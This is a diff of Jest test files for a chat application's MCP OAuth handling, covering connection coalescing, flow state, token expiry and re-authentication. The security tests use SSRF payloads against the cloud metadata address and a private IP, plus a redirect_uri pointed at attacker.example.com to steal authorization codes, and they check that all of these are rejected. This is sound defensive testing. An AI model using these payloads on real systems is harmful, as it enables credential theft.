.spyOn(
// eslint-disable-next-line @typescript-eslint/no-require-imports
require('~/mcp/registry/MCPServersRegistry').MCPServersRegistry,
'getInstance',
)
.mockReturnValue({
getServerConfig: jest.fn().mockResolvedValue(mockConfig),
shouldEnableSSRFProtection: jest.fn().mockReturnValue(false),
});
const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory');
const createSpy = jest.spyOn(MCPConnectionFactory, 'create').mockImplementation(async () => {
manager.createCallCount++;
await new Promise((r) => setTimeout(r, 100));
return mockConnection as never;
});
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const user = { id: 'user-1' };
const opts = {
serverName: 'test-server',
user: user as never,
flowManager: flowManager as never,
};
const [conn1, conn2, conn3] = await Promise.all([
manager.getUserConnection(opts),
manager.getUserConnection(opts),
manager.getUserConnection(opts),
]);
expect(conn1).toBe(conn2);
expect(conn2).toBe(conn3);
expect(createSpy).toHaveBeenCalledTimes(1);
expect(manager.createCallCount).toBe(1);
createSpy.mockRestore();
});
it('should not coalesce when forceNew is true', async () => {
const { UserConnectionManager } = await import('~/mcp/UserConnectionManager');
class TestManager extends UserConnectionManager {}
const manager = new TestManager();
let callCount = 0;
const makeConnection = () => ({
isConnected: jest.fn().mockResolvedValue(true),
disconnect: jest.fn().mockResolvedValue(undefined),
isStale: jest.fn().mockReturnValue(false),
});
const mockAppConnections = { has: jest.fn().mockResolvedValue(false) };
manager.appConnections = mockAppConnections as never;
const mockConfig = {
type: 'streamable-http',
url: 'http://localhost:9999/',
updatedAt: undefined,
dbId: undefined,
};
jest
.spyOn(
// eslint-disable-next-line @typescript-eslint/no-require-imports
require('~/mcp/registry/MCPServersRegistry').MCPServersRegistry,
'getInstance',
)
.mockReturnValue({
getServerConfig: jest.fn().mockResolvedValue(mockConfig),
shouldEnableSSRFProtection: jest.fn().mockReturnValue(false),
});
const { MCPConnectionFactory } = await import('~/mcp/MCPConnectionFactory');
jest.spyOn(MCPConnectionFactory, 'create').mockImplementation(async () => {
callCount++;
await new Promise((r) => setTimeout(r, 50));
return makeConnection() as never;
});
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const user = { id: 'user-2' };
const [conn1, conn2] = await Promise.all([
manager.getUserConnection({
serverName: 'test-server',
forceNew: true,
user: user as never,
flowManager: flowManager as never,
}),
manager.getUserConnection({
serverName: 'test-server',
forceNew: true,
user: user as never,
flowManager: flowManager as never,
}),
]);
expect(callCount).toBe(2);
expect(conn1).not.toBe(conn2);
});
});
describe('Fix 2: PENDING flow is reused, not deleted', () => {
it('should join an existing PENDING flow via createFlow instead of deleting it', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'test-flow-pending';
await flowManager.initFlow(flowId, 'mcp_oauth', {
clientInfo: { client_id: 'test-client' },
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('PENDING');
const deleteSpy = jest.spyOn(flowManager, 'deleteFlow');
const monitorPromise = flowManager.createFlow(flowId, 'mcp_oauth', {});
await new Promise((r) => setTimeout(r, 500));
await flowManager.completeFlow(flowId, 'mcp_oauth', {
access_token: 'test-token',
token_type: 'Bearer',
} as never);
const result = await monitorPromise;
expect(result).toEqual(
expect.objectContaining({ access_token: 'test-token', token_type: 'Bearer' }),
);
expect(deleteSpy).not.toHaveBeenCalled();
deleteSpy.mockRestore();
});
it('should delete and recreate FAILED flows', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'test-flow-failed';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.failFlow(flowId, 'mcp_oauth', 'previous error');
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('FAILED');
await flowManager.deleteFlow(flowId, 'mcp_oauth');
const afterDelete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(afterDelete).toBeUndefined();
});
});
describe('Fix 3: completeFlow handles deleted state gracefully', () => {
it('should return false when state was deleted by race', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'race-deleted-flow';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
await flowManager.deleteFlow(flowId, 'mcp_oauth');
const stateBeforeComplete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(stateBeforeComplete).toBeUndefined();
const result = await flowManager.completeFlow(flowId, 'mcp_oauth', {
access_token: 'recovered-token',
token_type: 'Bearer',
} as never);
expect(result).toBe(false);
const stateAfterComplete = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(stateAfterComplete).toBeUndefined();
expect(mockLogger.warn).toHaveBeenCalledWith(
expect.stringContaining('cannot recover metadata'),
expect.any(Object),
);
});
it('should reject monitorFlow when state is deleted and not recoverable', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager(store as unknown as Keyv, { ttl: 30000, ci: true });
const flowId = 'monitor-retry-flow';
await flowManager.initFlow(flowId, 'mcp_oauth', {});
const monitorPromise = flowManager.createFlow(flowId, 'mcp_oauth', {});
await new Promise((r) => setTimeout(r, 500));
await flowManager.deleteFlow(flowId, 'mcp_oauth');
await expect(monitorPromise).rejects.toThrow('Flow state not found');
});
});
describe('State mapping cleanup on flow replacement', () => {
it('should delete old state mapping when a flow is replaced', async () => {
const store = new MockKeyv();
const flowManager = new FlowStateManager<MCPOAuthTokens | null>(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
const oldState = 'old-random-state-abc123';
const newState = 'new-random-state-xyz789';
// Simulate initial flow with state mapping
await flowManager.initFlow(flowId, 'mcp_oauth', { state: oldState });
await MCPOAuthHandler.storeStateMapping(oldState, flowId, flowManager);
// Old state should resolve
const resolvedBefore = await MCPOAuthHandler.resolveStateToFlowId(oldState, flowManager);
expect(resolvedBefore).toBe(flowId);
// Replace the flow: delete old, create new, clean up old state mapping
await flowManager.deleteFlow(flowId, 'mcp_oauth');
await MCPOAuthHandler.deleteStateMapping(oldState, flowManager);
await flowManager.initFlow(flowId, 'mcp_oauth', { state: newState });
await MCPOAuthHandler.storeStateMapping(newState, flowId, flowManager);
// Old state should no longer resolve
const resolvedOld = await MCPOAuthHandler.resolveStateToFlowId(oldState, flowManager);
expect(resolvedOld).toBeNull();
// New state should resolve
const resolvedNew = await MCPOAuthHandler.resolveStateToFlowId(newState, flowManager);
expect(resolvedNew).toBe(flowId);
});
});
describe('Fix 4: ReauthenticationRequiredError for no-refresh-token', () => {
it('should throw ReauthenticationRequiredError when access token expired and no refresh token', async () => {
const expiredDate = new Date(Date.now() - 60000);
const findToken = jest.fn().mockImplementation(async (filter: { type?: string }) => {
if (filter.type === 'mcp_oauth') {
return {
token: 'enc:expired-access-token',
expiresAt: expiredDate,
createdAt: new Date(Date.now() - 120000),
};
}
if (filter.type === 'mcp_oauth_refresh') {
return null;
}
return null;
});
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow('Re-authentication required');
});
it('should throw ReauthenticationRequiredError when access token is missing and no refresh token', async () => {
const findToken = jest.fn().mockResolvedValue(null);
await expect(
MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should not throw when access token is valid', async () => {
const futureDate = new Date(Date.now() + 3600000);
const findToken = jest.fn().mockImplementation(async (filter: { type?: string }) => {
if (filter.type === 'mcp_oauth') {
return {
token: 'enc:valid-access-token',
expiresAt: futureDate,
createdAt: new Date(),
};
}
if (filter.type === 'mcp_oauth_refresh') {
return null;
}
return null;
});
const result = await MCPTokenStorage.getTokens({
userId: 'user-1',
serverName: 'test-server',
findToken,
});
expect(result).not.toBeNull();
expect(result?.access_token).toBe('valid-access-token');
});
});
describe('E2E: OAuth-gated MCP server with no refresh tokens', () => {
let server: OAuthTestServer;
beforeEach(async () => {
server = await createOAuthMCPServer({ tokenTTLMs: 60000 });
});
afterEach(async () => {
await server.close();
});
it('should start OAuth-gated MCP server that validates Bearer tokens', async () => {
const res = await fetch(server.url, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ jsonrpc: '2.0', method: 'initialize', id: 1 }),
});
expect(res.status).toBe(401);
const body = (await res.json()) as { error: string };
expect(body.error).toBe('invalid_token');
});
it('should issue tokens via authorization code exchange with no refresh token', async () => {
const authRes = await fetch(`${server.url}authorize?redirect_uri=http://localhost&state=s1`, {
redirect: 'manual',
});
expect(authRes.status).toBe(302);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
expect(code).toBeTruthy();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
expect(tokenRes.status).toBe(200);
const tokenBody = (await tokenRes.json()) as {
access_token: string;
token_type: string;
refresh_token?: string;
};
expect(tokenBody.access_token).toBeTruthy();
expect(tokenBody.token_type).toBe('Bearer');
expect(tokenBody.refresh_token).toBeUndefined();
});
it('should allow MCP requests with valid Bearer token', async () => {
const authRes = await fetch(`${server.url}authorize?redirect_uri=http://localhost&state=s1`, {
redirect: 'manual',
});
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const { access_token } = (await tokenRes.json()) as { access_token: string };
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
});
it('should reject expired tokens with 401', async () => {
const shortTTLServer = await createOAuthMCPServer({ tokenTTLMs: 500 });
try {
const authRes = await fetch(
`${shortTTLServer.url}authorize?redirect_uri=http://localhost&state=s1`,
{ redirect: 'manual' },
);
const location = authRes.headers.get('location') ?? '';
const code = new URL(location).searchParams.get('code');
const tokenRes = await fetch(`${shortTTLServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const { access_token } = (await tokenRes.json()) as { access_token: string };
await new Promise((r) => setTimeout(r, 600));
const mcpRes = await fetch(shortTTLServer.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Authorization: `Bearer ${access_token}`,
},
body: JSON.stringify({ jsonrpc: '2.0', method: 'ping', id: 2 }),
});
expect(mcpRes.status).toBe(401);
} finally {
await shortTTLServer.close();
}
});
});
});


@@ -0,0 +1,228 @@
/**
* Tests verifying MCP OAuth security hardening:
*
 * 1. SSRF via OAuth URLs: validates that the OAuth handler rejects
 *    token_url, authorization_url, and revocation_endpoint values
 *    pointing to private/internal addresses.
 *
 * 2. redirect_uri manipulation: validates that a user-supplied redirect_uri
 *    is ignored in favor of the server-controlled default.
*/
import * as http from 'http';
import * as net from 'net';
import { TokenExchangeMethodEnum } from 'librechat-data-provider';
import type { Socket } from 'net';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import { createOAuthMCPServer } from './helpers/oauthTestServer';
import { MCPOAuthHandler } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
/**
* Mock only the DNS-dependent resolveHostnameSSRF; keep isSSRFTarget real.
* SSRF tests use literal private IPs (127.0.0.1, 169.254.169.254, 10.0.0.1)
* which are caught by isSSRFTarget before resolveHostnameSSRF is reached.
* This avoids non-deterministic DNS lookups in test execution.
*/
jest.mock('~/auth', () => ({
...jest.requireActual('~/auth'),
resolveHostnameSSRF: jest.fn(async () => false),
}));
function getFreePort(): Promise<number> {
return new Promise((resolve, reject) => {
const srv = net.createServer();
srv.listen(0, '127.0.0.1', () => {
const addr = srv.address() as net.AddressInfo;
srv.close((err) => (err ? reject(err) : resolve(addr.port)));
});
});
}
function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
describe('MCP OAuth SSRF protection', () => {
let oauthServer: OAuthTestServer;
let ssrfTargetServer: http.Server;
let ssrfTargetPort: number;
let ssrfRequestReceived: boolean;
let destroySSRFSockets: () => Promise<void>;
beforeEach(async () => {
ssrfRequestReceived = false;
oauthServer = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
ssrfTargetPort = await getFreePort();
ssrfTargetServer = http.createServer((_req, res) => {
ssrfRequestReceived = true;
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
access_token: 'ssrf-token',
token_type: 'Bearer',
expires_in: 3600,
}),
);
});
destroySSRFSockets = trackSockets(ssrfTargetServer);
await new Promise<void>((resolve) =>
ssrfTargetServer.listen(ssrfTargetPort, '127.0.0.1', resolve),
);
});
afterEach(async () => {
try {
await oauthServer.close();
} finally {
await destroySSRFSockets();
}
});
it('should reject token_url pointing to a private IP (refreshOAuthTokens)', async () => {
const code = await oauthServer.getAuthCode();
const tokenRes = await fetch(`${oauthServer.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
refresh_token: string;
};
const regRes = await fetch(`${oauthServer.url}register`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ redirect_uris: ['http://localhost/callback'] }),
});
const clientInfo = (await regRes.json()) as {
client_id: string;
client_secret: string;
};
const ssrfTokenUrl = `http://127.0.0.1:${ssrfTargetPort}/latest/meta-data/iam/security-credentials/`;
await expect(
MCPOAuthHandler.refreshOAuthTokens(
initial.refresh_token,
{
serverName: 'ssrf-test-server',
serverUrl: oauthServer.url,
clientInfo: {
...clientInfo,
redirect_uris: ['http://localhost/callback'],
},
},
{},
{
token_url: ssrfTokenUrl,
client_id: clientInfo.client_id,
client_secret: clientInfo.client_secret,
token_exchange_method: TokenExchangeMethodEnum.DefaultPost,
},
),
).rejects.toThrow(/targets a blocked address/);
expect(ssrfRequestReceived).toBe(false);
});
it('should reject private authorization_url in initiateOAuthFlow', async () => {
await expect(
MCPOAuthHandler.initiateOAuthFlow(
'test-server',
'https://mcp.example.com/',
'user-1',
{},
{
authorization_url: 'http://169.254.169.254/authorize',
token_url: 'https://auth.example.com/token',
client_id: 'client',
client_secret: 'secret',
},
),
).rejects.toThrow(/targets a blocked address/);
});
it('should reject private token_url in initiateOAuthFlow', async () => {
await expect(
MCPOAuthHandler.initiateOAuthFlow(
'test-server',
'https://mcp.example.com/',
'user-1',
{},
{
authorization_url: 'https://auth.example.com/authorize',
token_url: `http://127.0.0.1:${ssrfTargetPort}/token`,
client_id: 'client',
client_secret: 'secret',
},
),
).rejects.toThrow(/targets a blocked address/);
expect(ssrfRequestReceived).toBe(false);
});
it('should reject private revocationEndpoint in revokeOAuthToken', async () => {
await expect(
MCPOAuthHandler.revokeOAuthToken('test-server', 'some-token', 'access', {
serverUrl: 'https://mcp.example.com/',
clientId: 'client',
clientSecret: 'secret',
revocationEndpoint: 'http://10.0.0.1/revoke',
}),
).rejects.toThrow(/targets a blocked address/);
});
});
describe('MCP OAuth redirect_uri enforcement', () => {
it('should ignore attacker-supplied redirect_uri and use the server default', async () => {
const attackerRedirectUri = 'https://attacker.example.com/steal-code';
const result = await MCPOAuthHandler.initiateOAuthFlow(
'victim-server',
'https://mcp.example.com/',
'victim-user-id',
{},
{
authorization_url: 'https://auth.example.com/authorize',
token_url: 'https://auth.example.com/token',
client_id: 'attacker-client',
client_secret: 'attacker-secret',
redirect_uri: attackerRedirectUri,
},
);
const authUrl = new URL(result.authorizationUrl);
const expectedRedirectUri = `${process.env.DOMAIN_SERVER || 'http://localhost:3080'}/api/mcp/victim-server/oauth/callback`;
expect(authUrl.searchParams.get('redirect_uri')).toBe(expectedRedirectUri);
expect(authUrl.searchParams.get('redirect_uri')).not.toBe(attackerRedirectUri);
});
});


@@ -0,0 +1,654 @@
/**
* Tests for MCP OAuth token expiry re-authentication scenarios.
*
* Reproduces the edge case where:
* 1. Tokens are stored (access + refresh)
* 2. Access token expires
* 3. Refresh attempt fails (server rejects/revokes refresh token)
* 4. System must fall back to full OAuth re-auth via handleOAuthRequired
* 5. The CSRF cookie may be absent (chat/SSE flow), so the PENDING flow fallback is needed
*
* Also tests the happy path: access token expired but refresh succeeds.
*/
import { Keyv } from 'keyv';
import { logger } from '@librechat/data-schemas';
import { FlowStateManager, PENDING_STALE_MS } from '~/flow/manager';
import { MCPTokenStorage, ReauthenticationRequiredError } from '~/mcp/oauth';
import { MockKeyv, InMemoryTokenStore, createOAuthMCPServer } from './helpers/oauthTestServer';
import type { OAuthTestServer } from './helpers/oauthTestServer';
import type { MCPOAuthTokens } from '~/mcp/oauth';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
describe('MCP OAuth Token Expiry Scenarios', () => {
afterEach(() => {
jest.clearAllMocks();
});
describe('Access token expired + refresh token available + refresh succeeds', () => {
let server: OAuthTestServer;
let tokenStore: InMemoryTokenStore;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 500,
issueRefreshTokens: true,
});
tokenStore = new InMemoryTokenStore();
});
afterEach(async () => {
await server.close();
});
it('should refresh expired access token via real /token endpoint', async () => {
// Get initial tokens from real server
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Store expired access token directly (bypassing storeTokens' expiresIn clamping)
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: `enc:${initial.access_token}`,
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: `enc:${initial.refresh_token}`,
expiresIn: 86400,
});
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
throw new Error(`Refresh failed: ${res.status}`);
}
const data = (await res.json()) as {
access_token: string;
token_type: string;
expires_in: number;
};
return {
...data,
obtained_at: Date.now(),
expires_at: Date.now() + data.expires_in * 1000,
};
};
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).not.toBeNull();
expect(result!.access_token).not.toBe(initial.access_token);
// Verify the refreshed token works against the server
const mcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${result!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(mcpRes.status).toBe(200);
});
});
describe('Access token expired + refresh token rejected by server', () => {
let tokenStore: InMemoryTokenStore;
beforeEach(() => {
tokenStore = new InMemoryTokenStore();
});
it('should return null when refresh token is rejected (invalid_grant)', async () => {
const server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
try {
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Store expired access token directly
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: `enc:${initial.access_token}`,
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: `enc:${initial.refresh_token}`,
expiresIn: 86400,
});
// Simulate server revoking the refresh token
server.issuedRefreshTokens.clear();
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
const body = (await res.json()) as { error: string };
throw new Error(`Token refresh failed: ${body.error}`);
}
const data = (await res.json()) as MCPOAuthTokens;
return data;
};
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).toBeNull();
expect(logger.error).toHaveBeenCalledWith(
expect.stringContaining('Failed to refresh tokens'),
expect.any(Error),
);
} finally {
await server.close();
}
});
it('should return null when refresh endpoint returns unauthorized_client', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: 'enc:some-refresh-token',
expiresIn: 86400,
});
const refreshCallback = jest
.fn()
.mockRejectedValue(new Error('unauthorized_client: client not authorized for refresh'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
expect(result).toBeNull();
expect(logger.info).toHaveBeenCalledWith(
expect.stringContaining('does not support refresh tokens'),
);
});
});
describe('Access token expired + NO refresh token → ReauthenticationRequiredError', () => {
let tokenStore: InMemoryTokenStore;
beforeEach(() => {
tokenStore = new InMemoryTokenStore();
});
it('should throw ReauthenticationRequiredError when no refresh token stored', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should throw ReauthenticationRequiredError with correct reason for expired token', async () => {
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow('access token expired');
});
it('should throw ReauthenticationRequiredError with correct reason for missing token', async () => {
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
}),
).rejects.toThrow('access token missing');
});
});
describe('PENDING flow fallback for CSRF-less OAuth callbacks', () => {
it('should allow OAuth completion when PENDING flow exists (simulating chat/SSE path)', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
userId: 'user1',
serverUrl: 'https://example.com',
state: 'test-state',
authorizationUrl: 'https://example.com/authorize?state=user1:test-server',
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(state?.status).toBe('PENDING');
const tokens: MCPOAuthTokens = {
access_token: 'new-access-token',
token_type: 'Bearer',
refresh_token: 'new-refresh-token',
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
};
const completed = await flowManager.completeFlow(flowId, 'mcp_oauth', tokens);
expect(completed).toBe(true);
const completedState = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(completedState?.status).toBe('COMPLETED');
expect((completedState?.result as MCPOAuthTokens | undefined)?.access_token).toBe(
'new-access-token',
);
});
it('should store authorizationUrl in flow metadata for re-issuance', async () => {
const store = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(store as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'user1:test-server';
const authUrl = 'https://auth.example.com/authorize?client_id=abc&state=user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
userId: 'user1',
serverUrl: 'https://example.com',
state: 'test-state',
authorizationUrl: authUrl,
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect((state?.metadata as Record<string, unknown>)?.authorizationUrl).toBe(authUrl);
});
});
describe('Full token expiry → refresh failure → re-auth flow', () => {
let server: OAuthTestServer;
let tokenStore: InMemoryTokenStore;
beforeEach(async () => {
server = await createOAuthMCPServer({
tokenTTLMs: 60000,
issueRefreshTokens: true,
});
tokenStore = new InMemoryTokenStore();
});
afterEach(async () => {
await server.close();
});
it('should go through full cycle: get tokens → expire → refresh fails → re-auth needed', async () => {
// Step 1: Get initial tokens
const code = await server.getAuthCode();
const tokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${code}`,
});
const initial = (await tokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token: string;
};
// Step 2: Store tokens with valid expiry first
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: initial,
createToken: tokenStore.createToken,
});
// Step 3: Verify tokens work
const validResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(validResult).not.toBeNull();
expect(validResult!.access_token).toBe(initial.access_token);
// Step 4: Simulate token expiry by directly updating the stored token's expiresAt
await tokenStore.updateToken({ userId: 'u1', identifier: 'mcp:test-srv' }, { expiresIn: -1 });
// Step 5: Revoke refresh token on server side (simulating server-side revocation)
server.issuedRefreshTokens.clear();
// Step 6: Try to get tokens — refresh should fail, return null
const refreshCallback = async (refreshToken: string): Promise<MCPOAuthTokens> => {
const res = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=refresh_token&refresh_token=${refreshToken}`,
});
if (!res.ok) {
const body = (await res.json()) as { error: string };
throw new Error(`Refresh failed: ${body.error}`);
}
const data = (await res.json()) as MCPOAuthTokens;
return data;
};
const expiredResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
// Refresh failed → returns null → triggers OAuth re-auth flow
expect(expiredResult).toBeNull();
// Step 7: Simulate the re-auth flow via FlowStateManager
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const flowId = 'u1:test-srv';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-srv',
userId: 'u1',
serverUrl: server.url,
state: 'test-state',
authorizationUrl: `${server.url}authorize?state=${flowId}`,
});
// Step 8: Get a new auth code and exchange for tokens (simulating user re-auth)
const newCode = await server.getAuthCode();
const newTokenRes = await fetch(`${server.url}token`, {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `grant_type=authorization_code&code=${newCode}`,
});
const newTokens = (await newTokenRes.json()) as {
access_token: string;
token_type: string;
expires_in: number;
refresh_token?: string;
};
// Step 9: Complete the flow
const mcpTokens: MCPOAuthTokens = {
...newTokens,
obtained_at: Date.now(),
expires_at: Date.now() + newTokens.expires_in * 1000,
};
await flowManager.completeFlow(flowId, 'mcp_oauth', mcpTokens);
// Step 10: Store the new tokens
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'test-srv',
tokens: mcpTokens,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
findToken: tokenStore.findToken,
});
// Step 11: Verify new tokens work
const newResult = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
});
expect(newResult).not.toBeNull();
expect(newResult!.access_token).toBe(newTokens.access_token);
// Step 12: Verify new token works against server
const finalMcpRes = await fetch(server.url, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
Accept: 'application/json, text/event-stream',
Authorization: `Bearer ${newResult!.access_token}`,
},
body: JSON.stringify({
jsonrpc: '2.0',
method: 'initialize',
